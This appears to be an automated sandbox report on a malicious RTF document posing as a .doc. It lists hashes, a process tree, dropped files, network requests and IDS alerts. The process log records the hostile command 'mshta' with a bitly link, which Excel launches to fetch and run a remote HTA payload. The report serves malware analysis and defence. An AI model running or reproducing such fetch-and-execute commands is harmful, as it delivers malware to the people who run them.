download: | 05e470_773b675a08744dbfb47b888c09158162.doc |
Full analysis: | https://app.any.run/tasks/d86e5a83-772b-42f9-a5f9-15d7d284bfb1 |
Verdict: | Malicious activity |
Analysis date: | April 25, 2019, 13:13:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, ANSI |
MD5: | 481F42248AAA3E02F00DC453A8EEAFF2 |
SHA1: | 323A67A4F70C559D04162441E37078676EBB4E07 |
SHA256: | 3FFD5CE69BBF8E4A1CA9291744E71FA60BC1B863E5A15268F5B42C43B79DAE83 |
SSDEEP: | 3072:CX3/BvEzcgqX3/BvEzcg6X3/BvEzcgqX3/BvEzcguX3/BvEzcg8:o/Bvoc3/Bvocz/Bvocz/Bvoc//BvocT |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2664 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05e470_773b675a08744dbfb47b888c09158162.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3400 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3228 | mshta http://www.bitly.com/ChutasdhikhasdAS13 | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3824 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
4056 | mshta http://www.bitly.com/ChutasdhikhasdAS13 | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR638E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3400 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B9D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3400 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFD36C939DD030B6AB.TMP | — | |
MD5:— | SHA256:— | |||
3824 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAD68.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F5C578E.wmf | — | |
MD5:— | SHA256:— | |||
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B187D781.wmf | wmf | |
MD5:F805B2269DCC910D671B2B45FE6CB033 | SHA256:631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F | |||
3228 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1].txt | html | |
MD5:80E8946AA6A9F56CE537A715C9EAB27E | SHA256:6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B | |||
4056 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\warning[1].txt | html | |
MD5:80E8946AA6A9F56CE537A715C9EAB27E | SHA256:6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B | |||
2664 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$e470_773b675a08744dbfb47b888c09158162.doc.rtf | pgc | |
MD5:00CF76CDC232F84A3217428FA453F66B | SHA256:DEEC40C12F59A000F68E210B9371C52629CC2B718A65407D79C32FA526F2DCC6 | |||
3228 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | |
MD5:8CB08150EF7D96FB8D3123162FB18A33 | SHA256:BFC09E3F830789B000DD6700CAEFFD868C7A21B2B40AD0ADDF29207BC8544247 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3228 | mshta.exe | GET | 302 | 67.199.248.14:80 | http://bitly.com/ChutasdhikhasdAS13 | US | html | 201 b | shared |
4056 | mshta.exe | GET | 302 | 67.199.248.14:80 | http://bitly.com/ChutasdhikhasdAS13 | US | html | 201 b | shared |
4056 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/ChutasdhikhasdAS13 | US | html | 178 b | shared |
3228 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/ChutasdhikhasdAS13 | US | html | 178 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3228 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
3228 | mshta.exe | 67.199.248.14:443 | www.bitly.com | Bitly Inc | US | shared |
4056 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
— | — | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
4056 | mshta.exe | 67.199.248.14:443 | www.bitly.com | Bitly Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bitly.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3228 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3228 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
4056 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |